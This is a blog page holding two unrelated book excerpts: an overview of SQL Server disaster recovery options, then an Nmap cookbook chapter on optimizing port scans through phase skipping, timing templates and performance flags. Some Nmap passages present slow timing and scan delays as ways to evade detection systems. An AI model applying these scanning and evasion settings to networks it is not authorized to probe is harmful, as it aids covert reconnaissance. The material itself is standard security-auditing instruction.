
Sunith Shetty
27 Feb 2018
10 min read

Getting to know SQL Server options for disaster recovery

[box type="note"]This article is an excerpt from a book written by Marek Chmel and Vladimír Mužný titled SQL Server 2017 Administrator's Guide. This book will help you learn to implement and administer successful database solutions with SQL Server 2017.[/box]

Today, we will explore the disaster recovery basics to understand the common terms in high availability and disaster recovery, and then discuss SQL Server's offerings for HA/DR.

Disaster recovery basics

Disaster recovery (DR) is a set of tools, policies, and procedures that help us recover our systems after a disastrous event. Disaster recovery is just a subset of a more complex discipline called business continuity planning, where more variables come into play and more sophisticated plans are expected for recovering business operations. With careful planning, you can minimize the effects of a disaster, because you have to keep in mind that it's nearly impossible to avoid disasters completely.

The main goal of a disaster recovery plan is to minimize the downtime of our service and to minimize data loss. To measure these objectives, we use two special metrics: the Recovery Time Objective and the Recovery Point Objective.

The Recovery Time Objective (RTO) is the maximum time that you can use to recover the system. This time includes your efforts to fix the problem without starting the disaster recovery procedures, the recovery itself, proper testing after the recovery, and communication to the stakeholders. Once a disaster strikes, the clock starts on the disaster recovery actions, and the Recovery Time Actual (RTA) metric is measured. If you manage to recover the system within the Recovery Time Objective, that is, RTA < RTO, then you have met the metric through a proper combination of planning and your ability to restore the system.

The Recovery Point Objective (RPO) is the maximum tolerable period of acceptable data loss.
The RPO defines how much data can be lost due to a disaster. The Recovery Point Objective has an impact on your implementation of backups, because you plan for a recovery strategy that has specific requirements for your backups. If you cannot afford to lose more than one day of work, you can plan the backup types and the frequency of the backups accordingly.

When we talk about system availability, we usually express it as a percentage of uptime. This availability is the calculated uptime in a given year or month (or any period you need) and is usually compared to the following table of "nines". Availability also expresses the tolerable downtime in a given time frame within which the system still meets the availability metric. The following table shows some common availability levels with the tolerable downtime per year and per day:

Availability %    Downtime a year     Downtime a day
90%               36.5 days           2.4 hours
98%               7.3 days            28.8 minutes
99%               3.65 days           14.4 minutes
99.9%             8.76 hours          1.44 minutes
99.99%            52.56 minutes       8.64 seconds
99.999%           5.26 minutes        less than 1 second

This tolerable downtime covers unplanned downtime, which can be caused by many factors:

- Natural disasters
- Hardware failures
- Human errors (accidental deletes, code breakdowns, and so on)
- Security breaches
- Malware

For these, we can have a mitigation plan in place that helps us reduce the downtime to a tolerable range, and we usually deploy a combination of high availability and disaster recovery solutions so that we can quickly restore operations. On the other hand, there is a reasonable set of events that require downtime on your service for maintenance and regular operations, which does not count against the availability of your system.
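The downtime figures in the "nines" table follow directly from the availability percentage. As a quick check, here is a short Python sketch; the helper name and structure are my own illustration, not from the book:

```python
# Convert an availability percentage into tolerable downtime budgets.
# A sketch of the arithmetic behind the "nines" table; the function is
# illustrative, not part of any SQL Server tooling.

MINUTES_PER_YEAR = 365 * 24 * 60   # 525,600 (non-leap year)
MINUTES_PER_DAY = 24 * 60

def downtime_budget(availability_pct):
    """Return (minutes of downtime per year, seconds of downtime per day)."""
    unavailable = 1 - availability_pct / 100
    per_year_min = unavailable * MINUTES_PER_YEAR
    per_day_sec = unavailable * MINUTES_PER_DAY * 60
    return per_year_min, per_day_sec

year_min, day_sec = downtime_budget(99.99)
print(round(year_min, 2))  # 52.56 minutes a year
print(round(day_sec, 2))   # 8.64 seconds a day
```

The printed values match the 99.99% row of the table, which is a useful sanity check when negotiating availability targets.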
These planned events can include the following:

- New releases of the software
- Operating system patching
- SQL Server patching
- Database maintenance and upgrades

Our goal is to have the database online as much as possible, but there will be times when the database is offline; from the perspective of management and operations, we talk about several keywords such as uptime, downtime, time to repair, and time between failures.

It's critical not only to have a plan for disaster recovery, but also to practice the disaster recovery itself. Many companies test their disaster recovery plans with different types of exercises, where each and every aspect of disaster recovery is carefully evaluated by teams who are familiar with the tools and procedures for a real disaster event. These exercises vary in scope and frequency:

- Tabletop exercises usually involve only a small number of people and focus on a specific aspect of the DR plan. This could be a DBA team drill to recover a single SQL Server, or a small set of servers, during a simulated outage.
- Medium-sized exercises involve several teams to practice team communication and interaction.
- Complex exercises usually simulate larger events, such as the loss of a data center, where a new virtual data center is built and all new servers and services are provisioned by the involved teams.

Such exercises should be run on a periodic basis so that all the teams and team personnel stay up to speed with the disaster recovery plans.

SQL Server options for high availability and disaster recovery

SQL Server has many features that you can put in place to implement an HA/DR solution that fits your needs.
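As an aside, before moving on to the features: the keywords mentioned above (uptime, time to repair, time between failures) are tied together by the standard reliability formula, availability = MTBF / (MTBF + MTTR). A minimal sketch; the helper is my own illustration, not from the book:

```python
# Availability from MTBF (mean time between failures) and MTTR
# (mean time to repair). Standard reliability formula; the helper
# function is illustrative only.

def availability(mtbf_hours, mttr_hours):
    """Fraction of time the service is up: MTBF / (MTBF + MTTR)."""
    return mtbf_hours / (mtbf_hours + mttr_hours)

# A system failing on average every 990 hours and taking 10 hours to repair:
print(f"{availability(990, 10):.2%}")  # 99.00%
```

This makes the trade-off explicit: you reach a higher "nine" either by failing less often (larger MTBF) or by repairing faster (smaller MTTR).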
SQL Server's HA/DR features include the following:

- Always On Failover Cluster Instances
- Always On Availability Groups
- Database mirroring
- Log shipping
- Replication

In many cases, you will combine several of these features, as your high availability and disaster recovery needs will overlap. HA/DR does not have to be limited to just one single feature. In complex scenarios, you'll plan for a primary high availability solution together with a secondary high availability solution that works as your disaster recovery solution at the same time.

Always On Failover Cluster

An Always On Failover Cluster Instance (FCI) is an instance-level protection mechanism built on top of Windows Server Failover Clustering (WSFC). The SQL Server instance is installed across multiple WSFC nodes, where it appears on the network as a single computer. All the resources that belong to one SQL Server instance (disks, network, names) are owned by one node of the cluster and, during any planned or unplanned event, such as the failure of a server component, they can be moved to another node in the cluster to preserve operations and minimize downtime.

Always On Availability Groups

Always On Availability Groups were introduced in SQL Server 2012 to bring database-level protection to SQL Server. As with Failover Cluster Instances, Availability Groups utilize Windows Server Failover Clustering; in this case, however, SQL Server is not installed as a clustered instance but runs independently on several nodes. These nodes can be configured as Always On Availability Group replicas to host a database, which is synchronized among the hosts. The replication can be either synchronous or asynchronous, so Always On Availability Groups are a good fit both within a single data center and across distant data centers to keep your data safe.
With newer SQL Server versions, Always On Availability Groups have been enhanced and provide many features for database high availability and disaster recovery scenarios.

Database mirroring

Database mirroring is an older HA/DR feature in SQL Server that provides database-level protection. Mirroring synchronizes a database between two servers, and you can include one more server as a witness to form a failover quorum. Unlike the previous two features, database mirroring does not require any special setup such as a failover cluster, and the configuration can be done in SSMS using a wizard available from the database properties. Once a transaction occurs on the principal node, it is copied to the mirrored database on the second node. With proper configuration, database mirroring can provide failover options for high availability with automatic client redirection. Database mirroring is no longer the preferred solution for HA/DR: it has been marked as a deprecated feature since SQL Server 2012 and is replaced by Basic Availability Groups in current versions.

Log shipping

Log shipping, as the name suggests, is a mechanism that keeps a database in sync by copying transaction logs to a remote server. Unlike mirroring, log shipping does not copy every single transaction; it copies transactions in batches via a transaction log backup on the primary node and a log restore on the secondary node. Unlike all the previously mentioned features, log shipping does not provide an automatic failover option, so it is considered more a disaster recovery option than a high availability one.
Log shipping operates on a regular schedule in which three jobs have to run:

- A backup job to back up the transaction log on the primary system
- A copy job to copy the backups to the secondary system
- A restore job to restore the transaction log backup on the secondary system

Log shipping supports multiple standby databases, which is quite an advantage compared to database mirroring. Another advantage is the standby configuration for log shipping, which allows read-only access to the secondary database. This is useful in many reporting scenarios, where reporting applications use read-only access and such a configuration offloads that work to the secondary system.

Replication

Replication is a feature for moving data from one server to another that allows many different scenarios and topologies. Replication uses a publisher/subscriber model, where the publisher is the server offering the content via a replication article and the subscribers receive the data. The configuration is more complex than the mirroring and log shipping features, but it allows much more variety in the configuration of security, performance, and topology. Replication has many benefits, a few of which are as follows:

- It works at the object level (whereas the other features work at the database or instance level)
- It allows merge replication, where several servers synchronize data with each other
- It allows bi-directional synchronization of data
- It allows non-SQL Server partners (Oracle, for example)

There are several replication types that can be used with SQL Server, and you can choose among them based on your HA/DR needs and the data availability requirements on the secondary servers. These options include the following:

- Snapshot replication
- Transactional replication
- Peer-to-peer replication
- Merge replication

We introduced the disaster recovery discipline along with the whole big picture of business continuity on SQL Server.
Disaster recovery is not only about having backups; it is about the ability to bring the service back into operation after severe failures. We have seen several options that can be used to implement part of disaster recovery on SQL Server: log shipping, replication, and mirroring. To learn more about how to design and use an optimal database management strategy, do check out the book SQL Server 2017 Administrator's Guide.
Packt
23 Jun 2017
20 min read

To Optimize Scans

In this article by Paulino Calderon Pale, author of the book Nmap Network Exploration and Security Auditing Cookbook, Second Edition, we will explore the following topics:

- Skipping phases to speed up scans
- Selecting the correct timing template
- Adjusting timing parameters
- Adjusting performance parameters

One of my favorite things about Nmap is how customizable it is. If configured properly, Nmap can be used to scan anything from single targets to millions of IP addresses in a single run. However, we need to be careful, and we need to understand the configuration options and scanning phases that can affect performance; most importantly, we should really think about our scan objective beforehand. Do we need the information from the reverse DNS lookup? Do we know all targets are online? Is the network congested? Do targets respond fast enough? These and many more aspects can really add up to your scanning time. Therefore, optimizing scans is important and can save us hours if we are working with many targets.

This article starts by introducing the different scanning phases and the timing and performance options. Unless we have a solid understanding of what goes on behind the curtains during a scan, we won't be able to completely optimize our scans. Timing templates are designed to work in common scenarios, but we want to go further and shave off those extra seconds per host during our scans. Remember that this can improve not only performance but accuracy as well; maybe those targets marked as offline were simply too slow to respond to the probes after all.

Skipping phases to speed up scans

Nmap scans can be broken into phases. When we are working with many hosts, we can save time by skipping tests or phases that return information we don't need or that we already have. By carefully selecting our scan flags, we can significantly improve the performance of our scans.
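As a small illustration of how these flags combine, the sketch below builds an Nmap command line from the phase-skipping choices discussed in this section. The flags themselves (-n, -Pn, -T, -p-) are real Nmap options; the helper function is my own and not part of Nmap or the book:

```python
# Build an Nmap argument list from phase-skipping choices.
# The flags are Nmap's; the helper is an illustrative sketch only.

def build_nmap_args(target, skip_dns=False, skip_ping=False,
                    timing=4, all_ports=False):
    args = ["nmap", f"-T{timing}"]
    if skip_dns:
        args.append("-n")    # skip reverse DNS resolution
    if skip_ping:
        args.append("-Pn")   # skip host discovery (no ping)
    if all_ports:
        args.append("-p-")   # scan all 65,535 TCP ports
    args.append(target)
    return args

# Reproduces the first command in the recipe below:
print(" ".join(build_nmap_args("74.207.244.221", skip_dns=True,
                               skip_ping=True, all_ports=True)))
# nmap -T4 -n -Pn -p- 74.207.244.221
```

Encoding the choices this way makes it easy to toggle individual phases when benchmarking scans against many targets.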
This recipe explains the process that takes place behind the curtains when scanning, and how to skip certain phases to speed up scans.

How to do it...

To perform a full port scan with the timing template set to aggressive, and without reverse DNS resolution (-n) or ping (-Pn), use the following command:

# nmap -T4 -n -Pn -p- 74.207.244.221

Note the scanning time at the end of the report:

Nmap scan report for 74.207.244.221
Host is up (0.11s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
9929/tcp open  nping-echo
Nmap done: 1 IP address (1 host up) scanned in 60.84 seconds

Now, compare this with the running time we get if we don't skip any tests:

# nmap -p- scanme.nmap.org

Nmap scan report for scanme.nmap.org (74.207.244.221)
Host is up (0.11s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
9929/tcp open  nping-echo
Nmap done: 1 IP address (1 host up) scanned in 77.45 seconds

Although the time difference isn't very drastic, it really adds up when you work with many hosts. I recommend that you think about your objectives and the information you need, and consider the possibility of skipping some of the scanning phases described next.

How it works...

Nmap scans are divided into several phases. Some of them require arguments to be set in order to run, but others, such as reverse DNS resolution, are executed by default. Let's review the phases that can be skipped and their corresponding Nmap flags:

Target enumeration: In this phase, Nmap parses the target list. This phase can't exactly be skipped, but you can save DNS forward lookups by using only IP addresses as targets.

Host discovery: This is the phase where Nmap establishes whether the targets are online and on the network. By default, Nmap sends an ICMP echo request and some additional probes, but it supports several host discovery techniques that can even be combined.
To skip the host discovery phase (no ping), use the flag -Pn. We can easily see which probes we skipped by comparing the packet traces of the two scans:

$ nmap -Pn -p80 -n --packet-trace scanme.nmap.org

SENT (0.0864s) TCP 106.187.53.215:62670 > 74.207.244.221:80 S ttl=46 id=4184 iplen=44 seq=3846739633 win=1024 <mss 1460>
RCVD (0.1957s) TCP 74.207.244.221:80 > 106.187.53.215:62670 SA ttl=56 id=0 iplen=44 seq=2588014713 win=14600 <mss 1460>
Nmap scan report for scanme.nmap.org (74.207.244.221)
Host is up (0.11s latency).
PORT   STATE SERVICE
80/tcp open  http
Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds

For scanning without skipping host discovery, we use the following command:

$ nmap -p80 -n --packet-trace scanme.nmap.org

SENT (0.1099s) ICMP 106.187.53.215 > 74.207.244.221 Echo request (type=8/code=0) ttl=59 id=12270 iplen=28
SENT (0.1101s) TCP 106.187.53.215:43199 > 74.207.244.221:443 S ttl=59 id=38710 iplen=44 seq=1913383349 win=1024 <mss 1460>
SENT (0.1101s) TCP 106.187.53.215:43199 > 74.207.244.221:80 A ttl=44 id=10665 iplen=40 seq=0 win=1024
SENT (0.1102s) ICMP 106.187.53.215 > 74.207.244.221 Timestamp request (type=13/code=0) ttl=51 id=42939 iplen=40
RCVD (0.2120s) ICMP 74.207.244.221 > 106.187.53.215 Echo reply (type=0/code=0) ttl=56 id=2147 iplen=28
SENT (0.2731s) TCP 106.187.53.215:43199 > 74.207.244.221:80 S ttl=51 id=34952 iplen=44 seq=2609466214 win=1024 <mss 1460>
RCVD (0.3822s) TCP 74.207.244.221:80 > 106.187.53.215:43199 SA ttl=56 id=0 iplen=44 seq=4191686720 win=14600 <mss 1460>
Nmap scan report for scanme.nmap.org (74.207.244.221)
Host is up (0.10s latency).
PORT   STATE SERVICE
80/tcp open  http
Nmap done: 1 IP address (1 host up) scanned in 0.41 seconds

Reverse DNS resolution: Host names often reveal additional information by themselves, and Nmap uses reverse DNS lookups to obtain them. This step can be skipped by adding the argument -n to your scan arguments.
Let's see the traffic generated by the two scans, with and without reverse DNS resolution. First, let's skip reverse DNS resolution by adding -n to the command:

$ nmap -n -Pn -p80 --packet-trace scanme.nmap.org

SENT (0.1832s) TCP 106.187.53.215:45748 > 74.207.244.221:80 S ttl=37 id=33309 iplen=44 seq=2623325197 win=1024 <mss 1460>
RCVD (0.2877s) TCP 74.207.244.221:80 > 106.187.53.215:45748 SA ttl=56 id=0 iplen=44 seq=3220507551 win=14600 <mss 1460>
Nmap scan report for scanme.nmap.org (74.207.244.221)
Host is up (0.10s latency).
PORT   STATE SERVICE
80/tcp open  http
Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds

Now let's try the same command, but without skipping reverse DNS resolution:

$ nmap -Pn -p80 --packet-trace scanme.nmap.org

NSOCK (0.0600s) UDP connection requested to 106.187.36.20:53 (IOD #1) EID 8
NSOCK (0.0600s) Read request from IOD #1 [106.187.36.20:53] (timeout: -1ms) EID 18
NSOCK (0.0600s) UDP connection requested to 106.187.35.20:53 (IOD #2) EID 24
NSOCK (0.0600s) Read request from IOD #2 [106.187.35.20:53] (timeout: -1ms) EID 34
NSOCK (0.0600s) UDP connection requested to 106.187.34.20:53 (IOD #3) EID 40
NSOCK (0.0600s) Read request from IOD #3 [106.187.34.20:53] (timeout: -1ms) EID 50
NSOCK (0.0600s) Write request for 45 bytes to IOD #1 EID 59 [106.187.36.20:53]: =............221.244.207.74.in-addr.arpa.....
NSOCK (0.0600s) Callback: CONNECT SUCCESS for EID 8 [106.187.36.20:53]
NSOCK (0.0600s) Callback: WRITE SUCCESS for EID 59 [106.187.36.20:53]
NSOCK (0.0600s) Callback: CONNECT SUCCESS for EID 24 [106.187.35.20:53]
NSOCK (0.0600s) Callback: CONNECT SUCCESS for EID 40 [106.187.34.20:53]
NSOCK (0.0620s) Callback: READ SUCCESS for EID 18 [106.187.36.20:53] (174 bytes)
NSOCK (0.0620s) Read request from IOD #1 [106.187.36.20:53] (timeout: -1ms) EID 66
NSOCK (0.0620s) nsi_delete() (IOD #1)
NSOCK (0.0620s) msevent_cancel() on event #66 (type READ)
NSOCK (0.0620s) nsi_delete() (IOD #2)
NSOCK (0.0620s) msevent_cancel() on event #34 (type READ)
NSOCK (0.0620s) nsi_delete() (IOD #3)
NSOCK (0.0620s) msevent_cancel() on event #50 (type READ)
SENT (0.0910s) TCP 106.187.53.215:46089 > 74.207.244.221:80 S ttl=42 id=23960 iplen=44 seq=1992555555 win=1024 <mss 1460>
RCVD (0.1932s) TCP 74.207.244.221:80 > 106.187.53.215:46089 SA ttl=56 id=0 iplen=44 seq=4229796359 win=14600 <mss 1460>
Nmap scan report for scanme.nmap.org (74.207.244.221)
Host is up (0.10s latency).
PORT   STATE SERVICE
80/tcp open  http
Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds

Port scanning: In this phase, Nmap determines the state of the ports. By default, it uses SYN or TCP connect scanning depending on the user's privileges, but several other port scanning techniques are supported. Although this may not be so obvious, Nmap can do a few different things with targets without port scanning them, such as resolving their DNS names or checking whether they are online.
For this reason, the port scanning phase can be skipped with the argument -sn:

$ nmap -sn -R --packet-trace 74.207.244.221

SENT (0.0363s) ICMP 106.187.53.215 > 74.207.244.221 Echo request (type=8/code=0) ttl=56 id=36390 iplen=28
SENT (0.0364s) TCP 106.187.53.215:53376 > 74.207.244.221:443 S ttl=39 id=22228 iplen=44 seq=155734416 win=1024 <mss 1460>
SENT (0.0365s) TCP 106.187.53.215:53376 > 74.207.244.221:80 A ttl=46 id=36835 iplen=40 seq=0 win=1024
SENT (0.0366s) ICMP 106.187.53.215 > 74.207.244.221 Timestamp request (type=13/code=0) ttl=50 id=2630 iplen=40
RCVD (0.1377s) TCP 74.207.244.221:443 > 106.187.53.215:53376 RA ttl=56 id=0 iplen=40 seq=0 win=0
NSOCK (0.1660s) UDP connection requested to 106.187.36.20:53 (IOD #1) EID 8
NSOCK (0.1660s) Read request from IOD #1 [106.187.36.20:53] (timeout: -1ms) EID 18
NSOCK (0.1660s) UDP connection requested to 106.187.35.20:53 (IOD #2) EID 24
NSOCK (0.1660s) Read request from IOD #2 [106.187.35.20:53] (timeout: -1ms) EID 34
NSOCK (0.1660s) UDP connection requested to 106.187.34.20:53 (IOD #3) EID 40
NSOCK (0.1660s) Read request from IOD #3 [106.187.34.20:53] (timeout: -1ms) EID 50
NSOCK (0.1660s) Write request for 45 bytes to IOD #1 EID 59 [106.187.36.20:53]: [............221.244.207.74.in-addr.arpa.....
NSOCK (0.1660s) Callback: CONNECT SUCCESS for EID 8 [106.187.36.20:53]
NSOCK (0.1660s) Callback: WRITE SUCCESS for EID 59 [106.187.36.20:53]
NSOCK (0.1660s) Callback: CONNECT SUCCESS for EID 24 [106.187.35.20:53]
NSOCK (0.1660s) Callback: CONNECT SUCCESS for EID 40 [106.187.34.20:53]
NSOCK (0.1660s) Callback: READ SUCCESS for EID 18 [106.187.36.20:53] (174 bytes)
NSOCK (0.1660s) Read request from IOD #1 [106.187.36.20:53] (timeout: -1ms) EID 66
NSOCK (0.1660s) nsi_delete() (IOD #1)
NSOCK (0.1660s) msevent_cancel() on event #66 (type READ)
NSOCK (0.1660s) nsi_delete() (IOD #2)
NSOCK (0.1660s) msevent_cancel() on event #34 (type READ)
NSOCK (0.1660s) nsi_delete() (IOD #3)
NSOCK (0.1660s) msevent_cancel() on event #50 (type READ)
Nmap scan report for scanme.nmap.org (74.207.244.221)
Host is up (0.10s latency).
Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds

In the previous example, we can see that an ICMP echo request and a reverse DNS lookup were performed (we forced DNS lookups with the option -R), but no port scanning was done.

There's more...

I recommend that you also run a couple of test scans to measure the speeds of the different DNS servers. I've found that ISPs tend to have the slowest DNS servers, but you can make Nmap use different DNS servers by specifying the argument --dns-servers. For example, to use Google's DNS servers, use the following command:

# nmap -R --dns-servers 8.8.8.8,8.8.4.4 -O scanme.nmap.org

You can test your DNS server speed by comparing the scan times. The following command tells Nmap not to ping or port scan, and to only perform a reverse DNS lookup:

$ nmap -R -Pn -sn 74.207.244.221
Nmap scan report for scanme.nmap.org (74.207.244.221)
Host is up.
Nmap done: 1 IP address (1 host up) scanned in 1.01 seconds

To further customize your scans, it is important that you understand the scan phases of Nmap. See Appendix: Scanning Phases for more information.
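When comparing DNS server speeds this way, it helps to extract the total scan time from each run automatically. A possible sketch follows; the parsing helper is my own, and the "Nmap done" line format is taken from the outputs shown above:

```python
import re

# Pull the total scan time out of Nmap's closing line so that runs with
# different --dns-servers can be compared programmatically.
# Illustrative helper only; not part of Nmap.

def scan_seconds(nmap_output):
    """Return the total scan time in seconds, or None if not found."""
    m = re.search(r"scanned in ([\d.]+) seconds", nmap_output)
    return float(m.group(1)) if m else None

report = "Nmap done: 1 IP address (1 host up) scanned in 1.01 seconds"
print(scan_seconds(report))  # 1.01
```

Feeding each run's output through this function gives a simple table of scan times per DNS server.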
Selecting the correct timing template

Nmap includes six templates that set different timing and performance arguments to optimize your scans based on network conditions. Even though Nmap automatically adjusts some of these values, it is recommended that you set the correct timing template to hint to Nmap about the speed of your network connection and the target's response time. The following will teach you about Nmap's timing templates and how to choose the most appropriate one.

How to do it...

Open your terminal and type the following command to use the aggressive timing template (-T4). Let's also use debugging (-d) to see what the option -T4 sets:

# nmap -T4 -d 192.168.4.20

--------------- Timing report ---------------
  hostgroups: min 1, max 100000
  rtt-timeouts: init 500, min 100, max 1250
  max-scan-delay: TCP 10, UDP 1000, SCTP 10
  parallelism: min 0, max 0
  max-retries: 6, host-timeout: 0
  min-rate: 0, max-rate: 0
---------------------------------------------
<Scan output removed for clarity>

You may use the integers between 0 and 5, that is, -T[0-5].

How it works...

The option -T is used to set the timing template in Nmap. Nmap provides six timing templates to help users tune the timing and performance arguments.
The available timing templates and their initial configuration values are as follows:

Paranoid (-T0): This template is useful for avoiding detection systems, but it is painfully slow because only one port is scanned at a time, and the timeout between probes is 5 minutes:

--------------- Timing report ---------------
  hostgroups: min 1, max 100000
  rtt-timeouts: init 300000, min 100, max 300000
  max-scan-delay: TCP 1000, UDP 1000, SCTP 1000
  parallelism: min 0, max 1
  max-retries: 10, host-timeout: 0
  min-rate: 0, max-rate: 0
---------------------------------------------

Sneaky (-T1): This template is useful for avoiding detection systems but is still very slow:

--------------- Timing report ---------------
  hostgroups: min 1, max 100000
  rtt-timeouts: init 15000, min 100, max 15000
  max-scan-delay: TCP 1000, UDP 1000, SCTP 1000
  parallelism: min 0, max 1
  max-retries: 10, host-timeout: 0
  min-rate: 0, max-rate: 0
---------------------------------------------

Polite (-T2): This template is used when scanning is not supposed to interfere with the target system; it is a very conservative and safe setting:

--------------- Timing report ---------------
  hostgroups: min 1, max 100000
  rtt-timeouts: init 1000, min 100, max 10000
  max-scan-delay: TCP 1000, UDP 1000, SCTP 1000
  parallelism: min 0, max 1
  max-retries: 10, host-timeout: 0
  min-rate: 0, max-rate: 0
---------------------------------------------

Normal (-T3): This is Nmap's default timing template, used when the argument -T is not set:

--------------- Timing report ---------------
  hostgroups: min 1, max 100000
  rtt-timeouts: init 1000, min 100, max 10000
  max-scan-delay: TCP 1000, UDP 1000, SCTP 1000
  parallelism: min 0, max 0
  max-retries: 10, host-timeout: 0
  min-rate: 0, max-rate: 0
---------------------------------------------

Aggressive (-T4): This is the recommended timing template for broadband and Ethernet connections:

--------------- Timing report ---------------
  hostgroups: min 1, max 100000
  rtt-timeouts: init 500, min 100, max 1250
  max-scan-delay: TCP 10, UDP 1000, SCTP 10
  parallelism: min 0, max 0
  max-retries: 6, host-timeout: 0
  min-rate: 0, max-rate: 0
---------------------------------------------

Insane (-T5): This timing template sacrifices accuracy for speed:

--------------- Timing report ---------------
  hostgroups: min 1, max 100000
  rtt-timeouts: init 250, min 50, max 300
  max-scan-delay: TCP 5, UDP 1000, SCTP 5
  parallelism: min 0, max 0
  max-retries: 2, host-timeout: 900000
  min-rate: 0, max-rate: 0
---------------------------------------------

There's more...

An interactive mode in Nmap allows users to press keys to dynamically change runtime variables such as verbosity, debugging, and packet tracing. Although the idea of including timing and performance options in the interactive mode has come up a few times on the development mailing list, so far this hasn't been implemented. However, there is an unofficial patch, submitted in June 2012, that allows you to change the minimum and maximum packet rate values (--max-rate and --min-rate) dynamically. If you would like to try it out, it's located at http://seclists.org/nmap-dev/2012/q2/883.

Adjusting timing parameters

Nmap not only adjusts itself to different network and target conditions while scanning, but it can also be fine-tuned using timing options to improve performance. Nmap automatically calculates packet round trip, timeout, and delay values, but these values can also be set manually through specific settings. The following describes the timing parameters supported by Nmap.

How to do it...
Enter the following command to adjust the initial round trip timeout, the delay between probes, and a timeout for each scanned host:

# nmap -T4 --scan-delay 1s --initial-rtt-timeout 150ms --host-timeout 15m -d scanme.nmap.org

--------------- Timing report ---------------
  hostgroups: min 1, max 100000
  rtt-timeouts: init 150, min 100, max 1250
  max-scan-delay: TCP 1000, UDP 1000, SCTP 1000
  parallelism: min 0, max 0
  max-retries: 6, host-timeout: 900000
  min-rate: 0, max-rate: 0
---------------------------------------------

How it works...

Nmap supports different timing arguments that can be customized. However, setting these values incorrectly will most likely hurt performance rather than improve it. Let's examine each timing parameter more closely and learn its Nmap option name.

The Round Trip Time (RTT) value is used by Nmap to know when to give up on or retransmit a probe. Nmap estimates this value by analyzing previous responses, but you can set the initial RTT timeout with the argument --initial-rtt-timeout, as shown in the following command:

# nmap -A -p- --initial-rtt-timeout 150ms <target>

In addition, you can set the minimum and maximum RTT timeout values with --min-rtt-timeout and --max-rtt-timeout, respectively, as shown in the following command:

# nmap -A -p- --min-rtt-timeout 200ms --max-rtt-timeout 600ms <target>

Another very important setting we can control in Nmap is the waiting time between probes. Use the arguments --scan-delay and --max-scan-delay to set the waiting time and the maximum amount of time allowed between probes, respectively, as shown in the following commands:

# nmap -A --max-scan-delay 10s scanme.nmap.org
# nmap -A --scan-delay 1s scanme.nmap.org

Note that these arguments are very useful for evading detection mechanisms. Be careful not to set --max-scan-delay too low, because it will most likely cause you to miss ports that are open.

There's more...
If you would like Nmap to give up on a host after a certain amount of time, you can set the argument --host-timeout:

# nmap -sV -A -p- --host-timeout 5m <target>

Estimating round trip times with Nping

To use Nping to estimate the round trip time between you and the target, the following command can be used:

# nping -c30 <target>

This makes Nping send 30 ICMP echo request packets; after it finishes, it shows the average, minimum, and maximum RTT values obtained:

# nping -c30 scanme.nmap.org
...
SENT (29.3569s) ICMP 50.116.1.121 > 74.207.244.221 Echo request (type=8/code=0) ttl=64 id=27550 iplen=28
RCVD (29.3576s) ICMP 74.207.244.221 > 50.116.1.121 Echo reply (type=0/code=0) ttl=63 id=7572 iplen=28
Max rtt: 10.170ms | Min rtt: 0.316ms | Avg rtt: 0.851ms
Raw packets sent: 30 (840B) | Rcvd: 30 (840B) | Lost: 0 (0.00%)
Tx time: 29.09096s | Tx bytes/s: 28.87 | Tx pkts/s: 1.03
Rx time: 30.09258s | Rx bytes/s: 27.91 | Rx pkts/s: 1.00
Nping done: 1 IP address pinged in 30.47 seconds

Examine the round trip times and use the maximum of them to set the correct --initial-rtt-timeout and --max-rtt-timeout values. The official documentation recommends using double the maximum RTT value for --initial-rtt-timeout, and as much as four times the maximum RTT value for --max-rtt-timeout.

Displaying the timing settings

Enable debugging to make Nmap inform you about the timing settings before scanning:

$ nmap -d <target>

--------------- Timing report ---------------
  hostgroups: min 1, max 100000
  rtt-timeouts: init 1000, min 100, max 10000
  max-scan-delay: TCP 1000, UDP 1000, SCTP 1000
  parallelism: min 0, max 0
  max-retries: 10, host-timeout: 0
  min-rate: 0, max-rate: 0
---------------------------------------------

To further customize your scans, it is important that you understand the scan phases of Nmap. See Appendix: Scanning Phases for more information.
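The rule of thumb quoted above (double the maximum RTT for --initial-rtt-timeout, up to four times it for --max-rtt-timeout) is easy to automate from Nping's output. A small sketch, using the Max rtt from the Nping run shown above; the helper itself is my own illustration:

```python
# Derive --initial-rtt-timeout / --max-rtt-timeout suggestions from a
# measured maximum RTT, following the documentation's rule of thumb
# (2x max RTT for the initial timeout, up to 4x for the maximum).
# Illustrative helper only; not part of Nmap or Nping.

def rtt_timeouts(max_rtt_ms):
    return {
        "--initial-rtt-timeout": f"{round(2 * max_rtt_ms)}ms",
        "--max-rtt-timeout": f"{round(4 * max_rtt_ms)}ms",
    }

# Using the Max rtt of 10.170ms reported by Nping above:
print(rtt_timeouts(10.170))
# {'--initial-rtt-timeout': '20ms', '--max-rtt-timeout': '41ms'}
```

These derived values can then be passed straight to the nmap command line shown earlier in this recipe.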
Adjusting performance parameters

Nmap not only adjusts itself to different network and target conditions while scanning, but it also supports several parameters that affect the behavior of Nmap, such as the number of hosts scanned concurrently, the number of retries, and the number of allowed probes. Learning how to adjust these parameters properly can reduce a lot of your scanning time. The following explains the Nmap parameters that can be adjusted to improve performance.

How to do it...

Enter the following command, adjusting the values for your target condition:

$ nmap --min-hostgroup 100 --max-hostgroup 500 --max-retries 2 <target>

How it works...

The command shown previously tells Nmap to scan and report by grouping no fewer than 100 (--min-hostgroup 100) and no more than 500 hosts (--max-hostgroup 500). It also tells Nmap to retry only twice before giving up on any port (--max-retries 2):

# nmap --min-hostgroup 100 --max-hostgroup 500 --max-retries 2 <target>

It is important to note that setting these values incorrectly will most likely hurt performance or accuracy rather than improve them. Nmap sends many probes during its port scanning phase due to the ambiguity of what a lack of response means; either the packet got lost, the service is filtered, or the service is not open. By default, Nmap adjusts the number of retries based on the network conditions, but you can set this value with the argument --max-retries. By increasing the number of retries, we can improve Nmap's accuracy, but keep in mind that this sacrifices speed:

$ nmap --max-retries 10 <target>

The arguments --min-hostgroup and --max-hostgroup control the number of hosts that we probe concurrently. Keep in mind that reports are also generated based on this value, so adjust it depending on how often you would like to see the scan results.
Larger groups are optimal to improve performance, but you may prefer smaller host groups on slow networks:

# nmap -A -p- --min-hostgroup 100 --max-hostgroup 500 <target>

